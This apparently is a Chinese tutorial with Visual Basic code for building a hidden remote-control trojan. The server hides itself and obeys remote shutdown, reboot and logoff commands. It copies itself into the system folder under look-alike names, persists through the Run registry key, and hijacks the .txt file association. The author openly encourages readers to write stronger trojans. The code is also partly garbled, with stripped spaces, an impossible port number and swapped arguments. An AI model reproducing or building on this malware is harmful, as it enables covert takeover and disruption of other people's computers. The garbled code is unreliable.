首先，新建一工程，名为Server，新建一个窗体，Name为Server，在窗体中加入一个winsock控件，Name设为sckServer，协议设为默认的TCP／IP协议。
　　
　　接下来我们回来Server窗体模块中，添加如下代码：
　　
　　->PrivateSubform_Load()
　　　WithMe
　　.sckServer.LocalPort=88917'本地端口（呵呵！我的生日！）
　　.sckServer.Listen'开始监听
　　　EndWith
　　EndSub
　　
　　'接受客户端的连接请求。
　　
　　PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
　　　WithMe
　　If.sckServer.StatesckClosedThen.sckServer.Close
　　.sckServer.Accept(requestID)
　　　EndWith
　　EndSub->
　　下面我们来建立客户端程序：新建一个工程，名为Client，把窗体名为Client，在上面加入一个winsock控件，名为sckClient，协议为TCP／IP协议。再加一个按钮cmdConnect在窗体模块中加入代码：
　　
　　->PrivateSubform_Load()
　　　WithMe
　　.sckClient.RemoteHost="127.0.0.1"'设置远程IP，本例设为本机。
　　.sckClient.RemotePort=88917'远程端口,就为server中的设置一样.
　　　EndWith
　　EndSub
　　
　　PrivatesubcmdConnect_Click()
　　　SckClient.Connect
　　Endsub->
　　至此，单击Connect按钮我们的两个工程已经可以进行通信了，但看不见，你可以在Client中的sckClient_Connect事件中加入代码：debug.print“Connetionsuccessful!”来查看。
　　
　　这仅是第一步，一点工作也做不了，下面我们来为它们添加功能。为了简单，本文章只实现一点小小的功能―――关机，重启，注销。好，开始吧！
　　
　　在Server工程中新建一个模块，Name为modApi，这个模快为一些API函数，添加如下API函数：
　　
　　->PublicDeclareFunctionExitWindowXXXLib"user32"Alias"ExitWindowXXX"(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong
　　
　　PublicConstEWX_LogoFF=0
　　PublicConstEWX_REBOOT=2
　　PublicConstEWX_SHUTDOWN=1
　　PublicDeclareFunctionClipCursorLib"user32"Alias"ClipCursor"(lpRectAsAny)AsLong
　　
　　PublicTypeRECT
　　　LeftAsLong
　　　TopAsLong
　　　RightAsLong
　　　BottomAsLong
　　EndType->
　　注：在两个socket中编程中，进行通信的重要事件是DataArrival事件，用于接收远程数据。
　　
　　下面在Client工程的Client窗体中放入三个按钮，分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机，注销，重启操作。分别添加如下代码：
　　
　　->PrivateSubcmdExit_Click()
　　　Me.sckClient.SendData"Exit"
　　EndSub
　　
　　PrivateSubcmdLogoff_Click()
　　　Me.sckClient.SendData"Logoff"
　　EndSub
　　
　　PrivateSubcmdReboot_Click()
　　　Me.sckClient.SendData"Reboot"
　　EndSub->
　　全都是对服务端发出请求。下面转到Server工程中：在Server中添加sckServer的DataArrial事件，接收客户端的请求。
　　
　　->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
　　　DimstrDataAsString
　　　WithMe
　　'接收客户请求的信息
　　.sckServer.GetDatastrData
　　SelectCasestrData
　　　Case"Exit"
　　'关机
　　CallExitWindowXXX(EWX_SHUTDOWN,0)
　　　Case"Reboot"
　　'重启
　　CallExitWindowXXX(EWX_REBOOT,0)
　　　Case"Logoff"
　　'注销
　　　CallExitWindowXXX(EWX_LogoFF,0)
　　EndSelect
　　　EndWith
　　
　　EndSub->
　　好了,到此我们已经实现功能了，但还不行，我们要它在背后运行。这简单，在Server中的form_Load事件中加入一句：me.hide。好这下看不见了，但大家知道木马是一开机就自动运行了，这又是为什么，怎么实现的？把它加入到注册表的启动组中？对，不错，跟我来吧！
　　
　　回到Server工程中的modApi中加入如下API函数：
　　
　　->PublicDeclareFunctionRegOpenKeyLib"advapi32.dll"Alias"RegOpenKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
　　
　　PublicDeclareFunctionRegSetvalueExLib"advapi32.dll"Alias"RegSetvalueExA"(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLong
　　
　　PublicDeclareFunctionRegCreateKeyLib"advapi32.dll"Alias"RegCreateKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
　　PublicConstREG_BINARY=3
　　
　　PublicConstREG_SZ=1
　　
　　PublicConstHKEY_LOCAL_MACHINE=&H80000002
　　
　　PublicConstHKEY_CLASSES_ROOT=&H80000000->
　　写到注册表启动组中的过程。
　　
　　->PublicSubStartupGroup()
　　
　　　DimsKeyAsString
　　　DimresultAsLong
　　　DimhKeyIDAsLong
　　　DimsKeyValAsString
　　
　　　sKey="Systrsy"'启动组中的键,找一个与系统文件相近的。
　　　sKeyVal="C:/windows/system/systrsy.exe"'木马文件的路径，可以用GetSystemDirectory来取得系统路径。
　　　result=RegOpenKey(HKEY_LOCAL_MACHINE,_
　　　"Software/Microsoft/Windows/CurrentVersion/Run",hKeyID)
　　　Ifresult=0Then
　　result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
　　　EndIf
　　EndSub->
　　好，就这样简单地完成了。但是，想过没有，如果不是很菜的鸟，到注册表中见一删，我们苦苦的心血不就白白地浪费了吗？不行，还得想让他发现了删也删不掉。请看下面的代码：
　　
　　->PublicSubWriteToTxt()
　　
　　　DimresultAsLong
　　　DimhKeyIDAsLong
　　　DimskeyAsString
　　　DimskeyValAsString
　　
　　　skey="txtfile/shell/open/command"
　　　skeyVal="C:/windows/system/txtView.exe"
　　　result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)
　　
　　　Ifresult=0Then
　　result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
　　　EndIf
　　EndSub->
　　肯定不少朋友一看就知道了，原是与txt文件进行关联，一点也不错，但C:/windows/system/txtView.exe是哪里来的，我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。
　　
　　好，回到Server工程的Server窗体的form_Load中，加入如下代码：
　　
　　->DimsCurrentPathAsString,sSystemDirAsString
　　sCurrentPath=App.Path&"/"&App.EXEName&".exe"
　　sSystemDir=“C:/windows/system”
　　OnErrorResumeNext
　　
　　　'复制文件成系统目录下的Systrsy.exe
　　　FileCopysCurrentPath,sSystemDir&"/Systrsy.exe"
　　OnErrorResumeNext
　　
　　复制文件成系统目录下的txtView.exe
　　
　　FileCopysCurrentPath,sSystemDir&"/txtView.exe"->
　　调用
　　
　　->CallstartupGroup
　　CallWriteToTxt
　　
　　'判断程序是否下在运行
　　
　　IfApp.PrevInstanceThen
　　　'如果已经运行就退出。
　　End
　　
　　EndIf->
　　好了，写到这里一个破坏性木马已经诞生了，我实验过还是比较好的一个，希望大家也能写一个好的木马，能突破冰河(呵呵！)
　　
　　注意：
　　
　　1、大家在处理端口是最好使用高端端口，否则会和一些常用端口发生冲突
　　
　　2、在第一次使用VB.NET的最好看看有关的图书，可能你能写出一款超级木马也说不定
　　->